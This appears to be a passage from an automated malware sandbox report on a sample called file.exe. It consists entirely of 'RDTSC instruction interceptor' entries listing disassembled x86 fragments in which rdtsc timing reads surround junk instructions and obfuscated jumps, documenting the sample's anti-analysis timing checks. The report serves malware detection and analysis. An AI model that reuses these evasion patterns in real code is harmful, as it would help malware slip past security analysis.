                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10F87 second address: C10F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C103B2 second address: C103C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F9278BE2828h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C103C7 second address: C103CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C103CD second address: C103E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9278BE2826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jbe 00007F9278BE282Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10C16 second address: C10C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10C21 second address: C10C37 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9278BE2826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007F9278BE2826h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10C37 second address: C10C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F927881D819h 0x0000000a jmp 00007F927881D811h 0x0000000f popad 0x00000010 jnp 00007F927881D818h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10DBE second address: C10DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10DC2 second address: C10DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14150 second address: C1415A instructions: 0x00000000 rdtsc 0x00000002 je 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14487 second address: C14499 instructions: 0x00000000 rdtsc 0x00000002 js 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14499 second address: C1449F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1449F second address: C144A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C144A5 second address: C144A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1453F second address: C14544 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1480F second address: C14827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C148BB second address: C148BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C148BF second address: C148C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C148C5 second address: C148CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C148CB second address: C148CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14DEB second address: C14E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jl 00007F927881D813h 0x0000000c jmp 00007F927881D80Dh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14E56 second address: C14E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9278BE282Dh 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 mov dword ptr [ebp+122D23F6h], ecx 0x00000016 nop 0x00000017 push esi 0x00000018 push ecx 0x00000019 jnc 00007F9278BE2826h 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14E86 second address: C14E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D815h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15048 second address: C1504E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15450 second address: C15460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D80Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15460 second address: C15464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C159CE second address: C159D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C159D4 second address: C159D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C159D8 second address: C159DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C159DC second address: C159FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9278BE2835h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1626F second address: C16276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16C3E second address: C16C4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17EF0 second address: C17EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17EF4 second address: C17EFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17EFA second address: C17F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F927881D80Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18BA0 second address: C18BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19561 second address: C19565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19565 second address: C195E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9278BE2830h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9278BE2828h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F9278BE282Ch 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F9278BE2828h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c jl 00007F9278BE282Ch 0x00000052 add dword ptr [ebp+122D582Eh], ecx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c pushad 0x0000005d popad 0x0000005e pop esi 0x0000005f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19F0C second address: C19F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AD14 second address: C1AD22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AD22 second address: C1AD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AD26 second address: C1AD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C208DF second address: C208E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C208E4 second address: C208F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C236EF second address: C23701 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F927881D80Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C208F9 second address: C208FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23D97 second address: C23D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23F61 second address: C23F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25F78 second address: C25F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25F7C second address: C25F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25139 second address: C25179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F927881D819h 0x00000008 jc 00007F927881D806h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F927881D824h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F927881D812h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26E40 second address: C26E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C27D92 second address: C27DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F927881D808h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, dx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F927881D808h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov ebx, dword ptr [ebp+12476A3Eh] 0x00000049 push eax 0x0000004a jng 00007F927881D825h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26FE3 second address: C26FE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28E2D second address: C28E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F927881D815h 0x0000000f push 00000000h 0x00000011 or di, 4BF1h 0x00000016 push 00000000h 0x00000018 jns 00007F927881D80Ch 0x0000001e add ebx, dword ptr [ebp+122D398Bh] 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 jmp 00007F927881D818h 0x0000002b jc 00007F927881D808h 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jng 00007F927881D806h 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C27F54 second address: C27F5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29EFD second address: C29F02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29F02 second address: C29F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9278BE2828h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E08C second address: C2E091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E091 second address: C2E097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E097 second address: C2E09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E09B second address: C2E130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9278BE282Dh 0x0000000e nop 0x0000000f push edi 0x00000010 push eax 0x00000011 mov edi, dword ptr [ebp+122D2136h] 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D230Eh], ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F9278BE2828h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d and ebx, dword ptr [ebp+122D3B8Bh] 0x00000043 jmp 00007F9278BE282Ah 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a jmp 00007F9278BE282Eh 0x0000004f pushad 0x00000050 push esi 0x00000051 pop esi 0x00000052 jmp 00007F9278BE2838h 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F9278BE2826h 0x00000064 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E130 second address: C2E147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B207 second address: C2B20C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C3B2 second address: C2C3BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C3BC second address: C2C3C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A14A second address: C2A14F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F187 second address: C2F191 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F191 second address: C2F197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F197 second address: C2F19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2D1DC second address: C2D296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D3843h] 0x0000000f jmp 00007F927881D80Eh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F927881D808h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov dword ptr [ebp+12464547h], esi 0x00000044 mov dword ptr [ebp+12464547h], ecx 0x0000004a mov eax, dword ptr [ebp+122D13CDh] 0x00000050 call 00007F927881D813h 0x00000055 mov ebx, edi 0x00000057 pop edi 0x00000058 sub dword ptr [ebp+122D2B58h], ebx 0x0000005e push FFFFFFFFh 0x00000060 call 00007F927881D812h 0x00000065 xor dword ptr [ebp+122D2408h], edi 0x0000006b pop ebx 0x0000006c nop 0x0000006d jne 00007F927881D80Eh 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F927881D816h 0x0000007b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2D296 second address: C2D29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3287E second address: C32882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32882 second address: C328AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F9278BE2838h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C328AB second address: C328B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34B6F second address: C34B82 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b ja 00007F9278BE2826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C302C7 second address: C302CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C329BC second address: C329C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C329C0 second address: C32AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D818h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F927881D808h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 and ebx, dword ptr [ebp+122D18E4h] 0x0000002d pushad 0x0000002e push eax 0x0000002f mov dword ptr [ebp+122D2967h], edi 0x00000035 pop ecx 0x00000036 popad 0x00000037 jmp 00007F927881D815h 0x0000003c push dword ptr fs:[00000000h] 0x00000043 mov dword ptr [ebp+122D2057h], ebx 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 ja 00007F927881D81Dh 0x00000056 mov eax, dword ptr [ebp+122D0335h] 0x0000005c call 00007F927881D811h 0x00000061 mov dword ptr [ebp+122D2337h], edx 0x00000067 pop ebx 0x00000068 push FFFFFFFFh 0x0000006a mov bl, 87h 0x0000006c jmp 00007F927881D80Ch 0x00000071 nop 0x00000072 jmp 00007F927881D80Fh 0x00000077 push eax 0x00000078 js 00007F927881D814h 0x0000007e push eax 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32AA3 second address: C32AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BDB6 second address: C3BDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BDBA second address: C3BDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BDBE second address: C3BDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BDC8 second address: C3BDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B569 second address: C3B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41A17 second address: C41A1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41ABB second address: C41AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41AC1 second address: C41AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD71C6 second address: BD71CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
